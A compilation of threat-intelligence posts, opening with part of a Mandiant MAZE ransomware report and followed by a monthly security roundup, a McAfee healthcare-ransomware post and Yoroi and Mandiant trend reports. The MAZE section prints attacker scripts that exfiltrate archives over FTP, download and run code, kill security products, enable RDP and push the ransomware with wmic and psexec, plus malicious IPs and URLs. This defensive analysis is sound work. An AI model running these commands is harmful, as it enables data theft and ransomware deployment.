      • A100-886 - Malicious File Transfer - Rclone.exe, Download
      • A100-484 - Scanning Activity - Nmap smb-enum-shares, SMB Share Enumeration

      Detecting the Techniques

      Platform

      Signature Name

      MVX (covers multiple FireEye technologies)

      Bale Detection

      FE_Ransomware_Win_MAZE_1

      Endpoint Security

      WMIC SHADOWCOPY DELETE (METHODOLOGY)

      MAZE RANSOMWARE (FAMILY)

      Network Security

      Ransomware.Win.MAZE

      Ransomware.Maze

      Ransomware.Maze

      MITRE ATT&CK Mappings

      Mandiant currently tracks three separate clusters of activity involved in the post-compromise distribution of MAZE ransomware. Future data collection and analysis efforts may reveal additional groups involved in intrusion activity supporting MAZE operations, or may instead allow us to collapse some of these groups into larger clusters. It should also be noted that ‘initial access’ phase techniques have been included in these mappings, though in some cases this access may have been provided by a separate threat actor(s).

      MAZE Group 1 MITRE ATT&CK Mapping

      ATT&CK Tactic Category

      Techniques

      Initial Access

      T1133: External Remote Services

      T1078: Valid Accounts

      Execution

      T1059: Command-Line Interface

      T1086: PowerShell

      T1064: Scripting

      T1035: Service Execution

      Persistence

      T1078: Valid Accounts

      T1050: New Service

      Privilege Escalation

      T1078: Valid Accounts

      Defense Evasion

      T1078: Valid Accounts

      T1036: Masquerading

      T1027: Obfuscated Files or Information

      T1064: Scripting

      Credential Access

      T1110: Brute Force

      T1003: Credential Dumping

      Discovery

      T1087: Account Discovery

      T1482: Domain Trust Discovery

      T1083: File and Directory Discovery

      T1135: Network Share Discovery

      T1069: Permission Groups Discovery

      T1018: Remote System Discovery

      T1016: System Network Configuration Discovery

      Lateral Movement

      T1076: Remote Desktop Protocol

      T1105: Remote File Copy

      Collection

      T1005: Data from Local System

      Command and Control

      T1043: Commonly Used Port

      T1105: Remote File Copy

      T1071: Standard Application Layer Protocol

      Exfiltration

      T1002: Data Compressed

      T1048: Exfiltration Over Alternative Protocol

      Impact

      T1486: Data Encrypted for Impact

      T1489: Service Stop

      MAZE Group 2 MITRE ATT&CK Mapping

      ATT&CK Tactic Category

      Techniques

      Initial Access

      T1193: Spearphishing Attachment

      Execution

      T1059: Command-Line Interface

      T1086: PowerShell

      T1085: Rundll32

      T1064: Scripting

      T1204: User Execution

      T1028: Windows Remote Management

      Persistence

      T1078: Valid Accounts

      T1050: New Service

      T1136: Create Account

      Privilege Escalation

      T1078: Valid Accounts

      T1050: New Service

      Defense Evasion

      T1078: Valid Accounts

      T1140: Deobfuscate/Decode Files or Information

      T1107: File Deletion

      T1036: Masquerading

      Credential Access

      T1003: Credential Dumping

      T1081: Credentials in Files

      T1171: LLMNR/NBT-NS Poisoning

      Discovery

      T1087: Account Discovery

      T1482: Domain Trust Discovery

      T1083: File and Directory Discovery

      T1135: Network Share Discovery

      T1069: Permission Groups Discovery

      T1018: Remote System Discovery

      T1033: System Owner/User Discovery

      Lateral Movement

      T1076: Remote Desktop Protocol

      T1028: Windows Remote Management

      Collection

      T1074: Data Staged

      T1005: Data from Local System

      T1039: Data from Network Shared Drive

      Command and Control

      T1043: Commonly Used Port

      T1219: Remote Access Tools

      T1105: Remote File Copy

      T1071: Standard Application Layer Protocol

      T1032: Standard Cryptographic Protocol

      Exfiltration

      T1020: Automated Exfiltration

      T1002: Data Compressed

      T1048: Exfiltration Over Alternative Protocol

      Impact

      T1486: Data Encrypted for Impact

      MAZE Group 3 MITRE ATT&CK Mapping (FIN6)

      ATT&CK Tactic Category

      Techniques

      Initial Access

      T1133: External Remote Services

      T1078: Valid Accounts

      Execution

      T1059: Command-Line Interface

      T1086: PowerShell

      T1064: Scripting

      T1035: Service Execution

      Persistence

      T1078: Valid Accounts

      T1031: Modify Existing Service

      Privilege Escalation

      T1055: Process Injection

      T1078: Valid Accounts

      Defense Evasion

      T1055: Process Injection

      T1078: Valid Accounts

      T1116: Code Signing

      T1089: Disabling Security Tools

      T1202: Indirect Command Execution

      T1112: Modify Registry

      T1027: Obfuscated Files or Information

      T1108: Redundant Access

      T1064: Scripting

      Credential Access

      T1003: Credential Dumping

      Discovery

      T1087: Account Discovery

      T1482: Domain Trust Discovery

      T1083: File and Directory Discovery

      T1069: Permission Groups Discovery

      T1018: Remote System Discovery

      Lateral Movement

      T1097: Pass the Ticket

      T1076: Remote Desktop Protocol

      T1105: Remote File Copy

      T1077: Windows Admin Shares

      Collection

      T1074: Data Staged

      T1039: Data from Network Shared Drive

      Command and Control

      T1043: Commonly Used Port

      T1219: Remote Access Tools

      T1105: Remote File Copy

      T1071: Standard Application Layer Protocol

      T1032: Standard Cryptographic Protocol

      Exfiltration

      T1002: Data Compressed

      Impact

      T1486: Data Encrypted for Impact

      T1490: Inhibit System Recovery

      T1489: Service Stop

      Example Commands Observed in MAZE Ransomware Incidents

      function Enum-UsersFolders($PathEnum)
      {
          $foldersArr = 'Desktop','Downloads','Documents','AppData/Roaming','AppData/Local'

          Get-ChildItem -Path $PathEnum'/c$' -ErrorAction SilentlyContinue
          Get-ChildItem -Path $PathEnum'/c$/Program Files' -ErrorAction SilentlyContinue
          Get-ChildItem -Path $PathEnum'/c$/Program Files (x86)' -ErrorAction SilentlyContinue

          foreach($Directory in Get-ChildItem -Path $PathEnum'/c$/Users' -ErrorAction SilentlyContinue) {

              foreach($SeachDir in $foldersArr) {
                  Get-ChildItem -Path $PathEnum'/c$/Users/'$Directory'/'$SeachDir -ErrorAction SilentlyContinue
              }
          }
      }

      PowerShell reconnaissance script used to enumerate directories

      $Dir="C:/Windows/Temp/"
      #ftp server
      $ftp = "ftp://<IP Address>/incoming/"
      $user = "<username>"
      $pass = "<password>"
      $webclient = New-Object System.Net.WebClient
      $webclient.Credentials = New-Object System.Net.NetworkCredential($user,$pass)
      #list every sql server trace file
      foreach($item in (dir $Dir "*.7z")){
         "Uploading $item..."
         $uri = New-Object System.Uri($ftp+$item.Name)
         $webclient.UploadFile($uri, $item.FullName)
      }

      Decoded FTP upload PowerShell script

      powershell -nop -exec bypass IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:43984/'); Add-FtpFile -ftpFilePath "ftp://<IP  Address>/cobalt_uploads/<file name>" -localFile "<local file path>\ <file name> " -userName "<username>" -password "<password>"

      Decoded FTP upload PowerShell script

      […]
      echo 7
      echo 7
      taskkill /im csrss_tc.exe /f
      taskkill /im kwsprod.exe /f
      taskkill /im avkwctl.exe /f
      taskkill /im rnav.exe /f
      taskkill /im crssvc.exe /f
      sc config CSAuth start= disabled
      taskkill /im vsserv.exe /f
      taskkill /im ppmcativedetection.exe /f
      […]
      taskkill /im sahookmain.exe /f
      taskkill /im mcinfo.exe /f
      reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
      netsh advfirewall firewall set rule group="remote desktop" new enable=Ye
      c:\windows\temp\sss.exe

      Excerpt from windows.bat kill script

      start copy sss.exe \\<internal IP>\c$\windows\temp\
      start copy sss.exe \\<internal IP>\c$\windows\temp\

      start copy windows.bat \\<internal IP>\c$\windows\temp\
      start copy windows.bat \\<internal IP>\c$\windows\temp\

      start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "c:\windows\temp\sss.exe"

      start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "c:\windows\temp\sss.exe"

      start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c c:\windows\temp\windows.bat"

      start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c c:\windows\temp\windows.bat"

      start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\sss.exe c:\windows\temp\"

      start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\sss.exe c:\windows\temp\"

      start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\windows.bat c:\windows\temp\"

      start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\windows.bat c:\windows\temp\"

      start psexec.exe \\<internal IP> -u <DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\sss.exe

      start psexec.exe \\<internal IP> -u <DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\sss.exe

      start psexec.exe \\<internal IP> -u <DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\windows.bat

      start psexec.exe \\<internal IP> -u < DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\windows.bat

      Example commands from MAZE distribution scripts

      @echo off
      del done.txt
      del offline.txt
      rem Loop thru list of computer names in file specified on command-line
      for /f %%i in (%1) do call :check_machine %%i
      goto end
      :check_machine
      rem Check to see if machine is up.
      ping -n 1 %1|Find "TTL=" >NUL 2>NUL
      if errorlevel 1 goto down
      echo %1
      START cmd /c "copy [Location of MAZE binary] \\%1\c$\windows\temp && exit"
      timeout 1 > NUL
      echo %1 >> done.txt
      rem wmic /node:"%1" process call create "regsvr32.exe /i C:\windows\temp\[MAZE binary name]" >> done.txt
      START "" cmd /c "wmic /node:"%1" process call create "regsvr32.exe /i C:\windows\temp\[MAZE binary name]" && exit"
      goto end
      :down
        rem Report machine down
        echo %1 >> offline.txt
      :end

      Example MAZE distribution script

      Indicators of Compromise

      Maze Payloads

      064058cf092063a5b69ed8fd2a1a04fe

      0f841c6332c89eaa7cac14c9d5b1d35b

      108a298b4ed5b4e77541061f32e55751

      11308e450b1f17954f531122a56fae3b

      15d7dd126391b0e7963c562a6cf3992c

      21a563f958b73d453ad91e251b11855c

      27c5ecbb94b84c315d56673a851b6cf9

      2f78ff32cbb3c478865a88276248d419

      335aba8d135cc2e66549080ec9e8c8b7

      3bfcba2dd05e1c75f86c008f4d245f62

      46b98ee908d08f15137e509e5e69db1b

      5774f35d180c0702741a46d98190ff37

      5df79164b6d0661277f11691121b1d53

      658e9deec68cf5d33ee0779f54806cc2

      65cf08ffaf12e47de8cd37098aac5b33

      79d137d91be9819930eeb3876e4fbe79

      8045b3d2d4a6084f14618b028710ce85

      8205a1106ae91d0b0705992d61e84ab2

      83b8d994b989f6cbeea3e1a5d68ca5d8

      868d604146e7e5cb5995934b085846e3

      87239ce48fc8196a5ab66d8562f48f26

      89e1ddb8cc86c710ee068d6c6bf300f4

      910aa49813ee4cc7e4fa0074db5e454a

      9eb13d56c363df67490bcc2149229e4c

      a0c5b4adbcd9eb6de9d32537b16c423b

      a3a3495ae2fc83479baeaf1878e1ea84

      b02be7a336dcc6635172e0d6ec24c554

      b40a9eda37493425782bda4a3d9dad58

      b4d6cb4e52bb525ebe43349076a240df

      b6786f141148925010122819047d1882

      b93616a1ea4f4a131cc0507e6c789f94

      bd9838d84fd77205011e8b0c2bd711e0

      be537a66d01c67076c8491b05866c894

      bf2e43ff8542e73c1b27291e0df06afd

      c3ce5e8075f506e396ee601f2757a2bd

      d2dda72ff2fbbb89bd871c5fc21ee96a

      d3eaab616883fcf51dcbdb4769dd86df

      d552be44a11d831e874e05cadafe04b6

      deebbea18401e8b5e83c410c6d3a8b4e

      dfa4631ec2b8459b1041168b1b1d5105

      e57ba11045a4b7bc30bd2d33498ef194

      e69a8eb94f65480980deaf1ff5a431a6

      ef95c48e750c1a3b1af8f5446fa04f54

      f04d404d84be66e64a584d425844b926

      f457bb5060543db3146291d8c9ad1001

      f5ecda7dd8bb1c514f93c09cea8ae00d

      f83cef2bf33a4d43e58b771e81af3ecc

      fba4cbb7167176990d5a8d24e9505f71

      Maze Check-in IPs

      91.218.114.11

      91.218.114.25

      91.218.114.26

      91.218.114.31

      91.218.114.32

      91.218.114.37

      91.218.114.38

      91.218.114.4

      91.218.114.77

      91.218.114.79

      92.63.11.151

      92.63.15.6 

      92.63.15.8 

      92.63.17.245

      92.63.194.20

      92.63.194.3

      92.63.29.137

      92.63.32.2 

      92.63.32.52

      92.63.32.55

      92.63.32.57

      92.63.37.100

      92.63.8.47

      Maze-related Domains

      aoacugmutagkwctu[.]onion

      mazedecrypt[.]top 

      mazenews[.]top

      newsmaze[.]top

      Maze Download URLs

      http://104.168.174.32/wordupd_3.0.1.tmp

      http://104.168.198.208/wordupd.tmp

      http://104.168.201.35/dospizdos.tmp

      http://104.168.201.47/wordupd.tmp

      http://104.168.215.54/wordupd.tmp

      http://149.56.245.196/wordupd.tmp

      http://192.119.106.235/mswordupd.tmp

      http://192.119.106.235/officeupd.tmp

      http://192.99.172.143/winupd.tmp

      http://54.39.233.188/win163.65.tmp

      http://91.208.184.174:8079/windef.exe

      http://agenziainformazioni[.]icu/wordupd.tmp

      http://www.download-invoice[.]site/Invoice_29557473.exe

      Malicious Documents

      1a26c9b6ba40e4e3c3dce12de266ae10

      53d5bdc6bd7904b44078cf80e239d42b

      79271dc08052480a578d583a298951c5

      a2d631fcb08a6c840c23a8f46f6892dd

      ad30987a53b1b0264d806805ce1a2561

      c09af442e8c808c953f4fa461956a30f

      ee26e33725b14850b1776a67bd8f2d0a

      BEACON C2s

      173.209.43.61

      193.36.237.173

      37.1.213.9

      37.252.7.142

      5.199.167.188

      checksoffice[.]me

      drivers.updatecenter[.]icu

      plaintsotherest[.]net

      thesawmeinrew[.]net

      updates.updatecenter[.]icu

      Cobalt Strike Binaries

      7507fe19afbda652e9b2768c10ad639f

      a93b86b2530cc988f801462ead702d84

      4f57e35a89e257952c3809211bef78ea

      bad6fc87a98d1663be0df23aedaf1c62

      f5ef96251f183f7fc63205d8ebf30cbf

      c818cc38f46c604f8576118f12fd0a63

      078cf6db38725c37030c79ef73519c0c

      c255daaa8abfadc12c9ae8ae2d148b31

      1fef99f05bf5ae78a28d521612506057

      cebe4799b6aff9cead533536b09fecd1

      4ccca6ff9b667a01df55326fcc850219

      bad6fc87a98d1663be0df23aedaf1c62

      Meterpreter C2s

      5.199.167.188

      Other Related Files

      3A5A9D40D4592C344920DD082029B362 (related script)

      76f8f28bd51efa03ab992fdb050c8382 (MAZE execution artifact)

      b5aa49c1bf4179452a85862ade3ef317 (windows.bat kill script) 

      fad3c6914d798e29a3fd8e415f1608f4 (related script)

      Tools & Utilities

      27304b246c7d5b4e149124d5f93c5b01 (PsExec)

      42badc1d2f03a8b1e4875740d3d49336 (7zip)

      75b55bb34dac9d02740b9ad6b6820360 (PsExec)

      9b02dd2a1a15e94922be3f85129083ac (AdFind)

      c621a9f931e4ebf37dace74efcce11f2 (SMBTools)

      f413b4a2242bb60829c9a470eea4dfb6 (winRAR) 

      Email Sender Domains

      att-customer[.]com

      att-information[.]com

      att-newsroom[.]com

      att-plans[.]com

      bezahlen-1und1[.]icu

      bzst-info[.]icu

      bzst-inform[.]icu

      bzstinfo[.]icu

      bzstinform[.]icu

      canada-post[.]icu

      canadapost-delivery[.]icu

      canadapost-tracking[.]icu

      hilfe-center-1und1[.]icu

      hilfe-center-internetag[.]icu

      trackweb-canadapost[.]icu

      Sender Domain Registrant Addresses

      abusereceive@hitler.rocks

      gladkoff1991@yandex.ru

      Mandiant Threat Intelligence will host an exclusive webinar on Thursday, May 21, 2020, at 8 a.m. PT / 11 a.m. ET to provide updated insight and information into the MAZE ransomware threat, and to answer questions from attendees. Register today to reserve your spot.

      Cyber Security Roundup for May 2020

      A roundup of UK focused Cyber and Information Security News, Blog Posts, Reports and general Threat Intelligence from the previous calendar month, April 2020.

      As well reported, UK foreign exchange firm Travelex business operations were brought to a standstill after its IT systems were severely hit by the Sodinokibi ransomware at the start of the year. It was reported that
       REvil group were behind the attack and had stolen 5Gbs of customer personal data, and then demanded $6 million (£4.6m) in ransom. The Wall Street Journal reported in April 2020 that Travelex had reached a deal, paying $2.3 million (£1.84m) in Bitcoin to the cybercriminals. This sort of response incentivises future ransomware activity against all other businesses and could lead to an inflation of future cyber-extortion demands in my opinion.

      Cognizant, a US large digital solutions provider and IT consultancy, was reportedly hit by the Maze ransomware.  Maze, previously known as the 'ChaCha' ransomware, like the Travelex attack, not only encrypts victim's files but steals sensitive data from the IT systems as well. Enabling the bad guys to threaten the publishing of the stolen data if the organisation cough up to their cyber-extortion demands, so the bad guys are very much rinsing and repeating lucrative attacks.

      Microsoft wrote an excellent blog covering the 'motley crew' of ransomware payloads  The blog covers ransomware payloads said to be straining security operations especially in health care, Microsoft warned, urging security teams to look for signs of credential theft and lateral movement activities that herald attacks.

      Researchers continue to be busy in exposing large sensitive datasets within misconfigured cloud services.  In April researchers reported 14 million Ring user details exposed in misconfigured AWS open database, fitness software Kinomap had 42 million user details exposed in another misconfigured database, and Maropost had 95 million users exposed, also in a misconfigured database.

      Nintendo confirmed 160,000 of its users' accounts had been accessed, exposing PII and Nintendo store accounts. The gaming giant Nintendo said from April, its user's accounts were accessed through the Nintendo Network ID (NNID), which is primarily used for Switch gaming. The company is unaware exactly how the intrusion had occurred, saying it “seems to have been made by impersonating login to “Nintendo Network ID. “If you use the same password for your NNID and Nintendo account, your balance and registered credit card / PayPal may be illegally used at My Nintendo Store or Nintendo eShop. Please set different passwords for NNID and Nintendo account,” Nintendo said. In response to these issues the company has abolished user’s ability to log into their Nintendo account via NNID and passwords for both NNID and Nintendo accounts are being reset and the company is recommending multi-factor authentication be set up for each account.  The account breaches weren't the only cyber issue affecting Nintendo in April, it reported that a bot, dubbed 'Bird Bot' was used by a reseller to buy up Nintendo Switches before customers could make their Switch purchase from Nintendo. The bot using reseller benefits at the expense of consumers, in buying up all available Switches directly from Nintendo, they are able to sell them on for higher prices, so making a quick and easy tidy profit, due to the current high demand of Switches and lack of supply.

      April was a busy month for security updates, Microsoft released security patches fixing 113 vulnerabilities on Patch Tuesday and an out-of-band patch for Teams found by researchers at CyberArk. Patch Tuesday for a quiet one for Adobe, though they released fixes for 21 critical vulnerabilities in illustrator and Bridge at the end of the month.  Oracle released a huge 397 fixes for 450 CVEs in over 100 products, which I think is a new record for a patch release!  

      Sophos said it and its customers were attacked when a previously unknown SQL injection vulnerability in their physical and virtual XG Firewall units was exploited. “The attack affected systems configured with either the administration interface (HTTPS admin service) or the user portal exposed on the WAN zone. In addition, firewalls manually configured to expose a firewall service (e.g. SSL VPN) to the WAN zone that shares the same port as the admin or User Portal were also affected,Sophos said.

      There were security critical patch releases for Mozilla Firefox, Chrome (twice), and for 8 Cisco products. A bunch of VMware patches for including a CVSS scored 10 (highest possible) in vCenter, a critical in vRealize Log Insight and a critical cross-site scripting vulnerability in ESXi 6.5 and 6.7. And finally, on the patch front, Intel decided to discontinue multiple products, as it was unable to keep ahead of patch their vulnerabilities.

      Stay safe, safe home and watch for the scams.

      BLOG
      NEWS

      AWARENESS, EDUCATION AND THREAT INTELLIGENCE

        Ransomware Attacks: Cybercriminals Pinpointing Healthcare Organizations

        Cybercriminals target healthcare

        No One is Invisible to Ransomware Attacks: Cybercriminals Pinpointing Healthcare Organizations 

         In this challenging time, cybercriminals have their eyes on consumers and institutions alike. Malicious groups have increased their targeting of hospitals and healthcare entities to take advantage of deepening resource strain. Many of these groups are using ransomware attacks to compromise hospital systems, locking up patient records or vaccine research until a hefty ransom is paid. The requested sum is usually a high value of Bitcoin or alternative cryptocurrencies, as these are typically more difficult to trace 

        However, unlike with old tax paperwork or private family photos, the impact of losing or mass distributing patient records could literally mean life or death for those awaiting urgent care or diagnosisBad actors count on this urgency to guarantee that their ransom is met 

        Be wary of old tactics with a new twist 

        The tactics these cybercriminals use can be a combination of traditional phishing and vulnerability exploitationReportedly, the WHO has seen a twofold increase in phishing attacks by cybercriminals attempting to steal credentials. Some ransomware groups have stated they will avoid targeting hospitals given the current strain on healthcare systems. Still, claims from criminal organizations should be taken with a hefty grain of salt.  

        Keep your security up to date 

        In the meantime, McAfee Advanced Threat Research is closely monitoring new threats that aim to take advantage of the uncertainty surrounding the pandemic. The team has analyzed these threats based on geography, and will continue to report further findings. While these threats are not unexpected as cyber criminals always try to leverage large events to their advantage, it is disappointing to see at a time when the world needs to come together that there are those who have scant regard for the sense of community. 

        Stay ahead of malicious threats 

        Whether you’re a healthcare professionalfamily provideror both, here are some tips that can help you stay ahead of malicious tactics being used to attack individuals and healthcare institutions 

        • Secure your home network by checking your device passwords and Wi-Fi password. Make sure your system and software are all up to date, and take the time to perform pending updates.  
        • Avoid clicking on emails and texts from unknown senders. Be wary of any communication coming from “official” sources that encourage urgent actions on provided links or ask for your login credentials.  
        • Check in often with family and friends and be their technical advisor if needed to help steer them away from social engineering or spammy phishing. Consider using a free safe browser extension that can help steer you away from illegitimate sites.  
        • Be sure to set up robust security on devices that may now be seeing a lot more online time.  
        • Don’t forget your phone  stay protected from malicious apps and smishing/vishing attempts.

        The post Ransomware Attacks: Cybercriminals Pinpointing Healthcare Organizations appeared first on McAfee Blogs.

        Cybersecurity Trends

        Trends are interesting since they could tell you where things are going.

        I do believe in studying history and behaviors in order to figure out where things are going on, so that every Year my colleagues from Yoroi and I spend several weeks to study and to write what we observed during the past months writing the Yoroi Cybersecurity Annual Report (freely downloadable from here: Yoroi Cybersecurity Report 2019).

        The Rise of Targeted Ransomware

        2019 was a breakthrough year in the cyber security of the European productive sector. The peculiarity of this year is not strictly related to the number of hacking attempts or in the malware code spread all over the Internet to compromise Companies assets and data but in the evolution and the consolidation of a new, highly dangerous kind of cyber attack. In 2019, we noticed a deep change in a consistent part of the global threat landscape, typically populated by States Sponsored actors, Cyber-Criminals and Hack-tivists, each one having some kind of attributes, both in motivations, objectives, methods and sophistications.

        During the 2019 we observed a rapid evolution of Cyber Crime ecosystems hosting a wide range of financially motivated actors. We observed an increased volume of money-driven attacks compared to previous years. But actors are also involved in cyber-espionage, CEO frauds, credential stealing operations, PII (Personally Identifiable Information) and IP (Intellectual Property) theft, but traditionally much more active in the so called “opportunistic” cyber attacks. Attacks opportunistically directed to all the internet population, such as botnets and crypto-miners infection waves, but also involved in regional operations, for instance designed to target European countries like Italy or Germany as branches of major global-scale operations, as we tracked since 2018 with the sLoad case and even earlier with the Ursnif malware propagations waves.
        In 2019 like what happened in 2018, Ransomware attacks played a significant role in the cyber arena. In previous years the whole InfoSec community observed the fast increase in o the Ransomware phenomenon, both in term of newborn ransomware families and also in the ransom payment options, driven by the consolidation of the digital cryptocurrencies market that made the traditional tracking techniques – operated by law enforcement agencies – l less effective due to new untrackable crypto currencies. But these increasing volumes weren’t the most worrying aspect we noticed.

        Before 2019, most ransomware attacks were conducted in an automated, mostly opportunistic fashion: for instance through drive by download attacks and exploit kits, but also very frequently using the email vector. In fact, the “canonical” ransomware attacks before 2019 were characterized by an incoming email luring the victim to open up an attachment, most of the times an Office Document, carefully obfuscated to avoid detection and weaponized to launch some ransomware malware able to autonomously encrypt local user files and shared documents.

        During 2019, we monitored a deep change in this trend. Ransomware attacks became more and more sophisticated. Gradually, even major cyber-criminal botnet operators, moved into this emerging sector leveraging their infection capabilities, their long term hacking experience and their bots to monetize their actions using new malicious business models. Indeed, almost every major malware family populating the cyber criminal landscape was involved in the delivery of follow up ransomware within infected hosts. A typical example is the Gandcrab ransomware installation operated by Ursnif implants during most of 2019. But some criminal groups have gone further. They set the threat level to a new baseline.

        Many major cyber criminal groups developed a sort of malicious “RedTeam” units, lest call them “DarkTeams”. These units are able to manually engage high value targets such as private companies or any kind of structured organization, gaining access to their core and owning the whole infrastructure at once, typically installing ransomware tools all across the network just after ensuring the deletion of the backup copies. Many times they are also using industry specific knowledge to tamper with management networks and hypervisors to reach an impressive level of potential damage.
        Actually, this kind of behaviour is not new to us. Such methods of operations have been used for a long time, but not by such a large number of actors and not with such kind of objectives. Network penetration was in fact a peculiarity of state sponsored groups and specialized cyber criminal gangs, often threatening the banking and retail sectors, typically referenced as Advanced Persistent Threats and traditionally targeting very large enterprises and organizations.
        During 2019, we observed a strong game change in the ransomware attacks panorama.

        The special “DarkTeams” replicated advanced intrusion techniques from APT playbooks carrying them into private business sectors which were not traditionally prepared to deal with such kinds of threats. Then, they started to hit organizations with high impact business attacks modeled to be very effective for the victim context. We are facing the evolution of ransomware by introducing Targeted Ransomware Attacks.

        We observed and tracked many gangs consolidating the new Targeted Ransomware Attacks model. Many of them have also been cited by mainstream media and press due to the heavy impact on the business operation of prestigious companies, such as the LockerGoga and Ryuk ransomware attacks, but they only were the tip of the iceberg. Many other criminal groups have consolidated this kind of operations such as DoppelPaymer, Nemty, REvil/Sodinokibi and Maze, definitely some of the top targeted ransomware players populating the threat landscape in the last half of 2019.
        In the past few months we also observed the emergence of a really worrisome practice by some of these players: the public shame of their victims. Maze was one of the first actors pionering this practice in 2019: the group started to disclose the name of the private companies they hacked into along with pieces of internal data stolen during the network intrusions.

        The problem rises when the stolen data includes Intellectual Property and Personal Identifiable Information. In such a case the attacker leaves the victim organization with an additional, infaust position during the cyber-crisis: handling of the data breach and the fines disposed by the Data Protection Authorities. During 2020 we expect these kinds of practices will be more and more common into the criminal criminal ecosystems. Thus, adopting a proactive approach to the Cyber Security Strategy leveraging services like Yoroi’s Cyber Security Defence Center could be crucial to equip the Company with proper technology to acquire visibility on targeted ransomware attacks, knowledge, skills and processes to spot and handle these kind of new class of threats.

        Zero-Day Malware

        Well Known threats are always easier to be recognized and managed since components and intents are very often clear. For example a Ransomware, as known today, performs some standard operations such as (but not limited to): reading file, encrypting file and writing back that file. An early discovery of known threat families would help analysts to perform quick and precise analyses, while unknown threats are always difficult to manage since analysts would need to discover firstly the intentions and then bring back behaviour to standard operations. This is why we track Zero-Day Malware. Yoroi’s technology captures and collects samples before processing them on Yoroi’s shared threat intelligence platform trying to attribute them to known threats.

        As part of the automatic analysis pipeline, Yoroi’s technology reports if the malicious files are potentially detected by Anti-Virus technologies during the detection time. This specific analogy is mainly done to figure-out if the incoming threat would be able to bypass perimetral and endpoint defences. As a positive side effect we collect data on detected threats related to their notoriety. In other words we are able to see if a Malware belonging to a

        threat actor or related to specific operation (or incident) is detected by AV, Firewall, Next Generation X and used endpoints.
        In this context, we shall define what we mean for Zero-Day Malware. We call Zero-Day malware every sample that turns out to be an unknown variant of arbitrary malware families. The following image (Fig:1) shows how most of the analyzed Malware is unknown from the InfoSec community and from common Antivirus vendors. This finding supports the even evolving Malware panorama in where attackers start from a shared code base but modify it depending on their needed to be stealth.

        Immagine che contiene dispositivo, disegnando

Descrizione generata automaticamente

        The reported data are collected during the first propagation of the malicious files across organizations. It means Companies are highly exposed to the risk of Zero-Day malware. Detection and response time plays a central role in such cases where the attack becomes stealth for hours or even for days.
        Along with the Zero-Day malware observation, most of the known malware at time of delivery have not so high chances of being blocked by security controls. The 8% of the malware is detected by few AV engines and only 33% is actually well identified at time of attack. Even the so-called “known malware” is still a relevant issue due to its capability to maintain a low detection rate during the first infection steps. Indeed only less than 20% of analyzed samples belonging to “not Zero-Day” are detected by more than 15 AV engines.

        Drilling down and observing the behavioural classification of the intercepted samples known by less than 5 AntiVirus engines at detection time, we might appreciate that the “Dropper” behaviour (i.e. the downloading or unpacking of other malicious stages or component) lead the way with 54% of cases, slightly decreasing since the 2018. One more interesting trend in the analyzed data is the surprising decrease of Ransomware behaviour, dropping from 17% of 2018 to the current 2%, and the bullish raise of “Trojan” behaviours up to 35% of times, more than doubled respect to the 15% of 2018.
        This trend endorses the evidence that ransomware attacks in 2019 begun to follow a targeted approach as described in the “The Rise of Targeted Ransomware” section.

        Immagine che contiene dispositivo

Descrizione generata automaticamente

        A reasonable interpretation of the darkling changes on these data, could actually conform with the sophistication of the malware infection chain discussed in the previous section. As a matter of fact, many of the delivered malware are actually a single part of a more complex infection chain. A chain able to install even multiple families of malware threats, starting from simple pieces of code behaving like droppers and trojan horses to grant access to a wider range of threats.   

        This trend gets another validation even in the Zero-Day malware data set: the samples likely unknown to Info.Sec. community – at the time of delivery –  substantially shifted their distribution from previous years. In particular, Ransomware behaviour detections dropped from 29% to 7% in 2019, and Trojan raised from 28% to 52% of cases, showing similar macro variations.

        Immagine che contiene dispositivo

Descrizione generata automaticamente

        If you want to read more details on “DarkTeams” and on what we observed during the past months, please feel free to download the full report HERE.

        They Come in the Night: Ransomware Deployment Trends

        Ransomware is a remote, digital shakedown. It is disruptive and expensive, and it affects all kinds of organizations, from cutting edge space technology firms, to the wool industry, to industrial environments. Infections have forced hospitals to turn away patients and law enforcement to drop cases against drug dealers. Ransomware operators have recently begun combining encryption with the threat of data leak and exposure in order to increase leverage against victims. There may be a silver lining, however; Mandiant Intelligence research suggests that focusing defensive efforts in key areas and acting quickly may allow organizations to stop ransomware before it is deployed.

        Mandiant Intelligence examined dozens of ransomware incident response investigations from 2017 to 2019. Through this research, we identified a number of common characteristics in initial intrusion vectors, dwell time, and time of day of ransomware deployment. We also noted threat actor innovations in tactics to maximize profits (Figure 1). Incidents affected organizations across North America, Europe, Asia Pacific, and the Middle East in nearly every sector category, including financial services, chemicals and materials, legal and professional services, local government, and healthcare. We observed intrusions attributed to financially motivated groups such as FIN6, TEMP.MixMaster, and dozens of additional activity sets.


        Figure 1: Themes Observed in Ransomware Incidents

        These incidents provide us with enhanced insight into ransomware trends that can be useful for network defenders, but it is worth bearing in mind that this data represents only a sample of all activity. For example, Mandiant ransomware investigations increased 860% from 2017 to 2019. The majority of these incidents appeared to be post-compromise infections, and we believe that threat actors are accelerating use of tactics including post compromise deployment to increase the likelihood of ransom payment. We also observed incidents in which ransomware was executed immediately, for example GANDCRAB and GLOBEIMPOSTER incidents, but most of the intrusions examined were longer duration and more complex post-compromise deployments.

        Common Initial Infection Vectors

